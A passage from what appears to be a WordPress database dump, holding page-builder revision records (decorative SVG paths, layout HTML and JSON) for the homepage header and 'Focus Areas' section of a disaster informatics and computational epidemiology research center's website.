0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',22,'https://gsudice.dataconn.net/?p=398',0,'revision','',0),(402,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c31\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c32\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c30\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c28\",\"parentId\":\"20-c26\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c28\",\"index\":0,\"id\":\"20-c29\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c26\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',168,'https://gsudice.dataconn.net/?p=402',0,'revision','',0),(403,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c30\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c30 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c31-outer\">\n <div data-colibri-id=\"20-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c32-outer\">\n <div data-colibri-id=\"20-c32\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c26\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c26 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c28-outer\">\n <div data-colibri-id=\"20-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c29\" class=\"h-global-transition-all h-heading style-334 style-local-20-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c29\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational 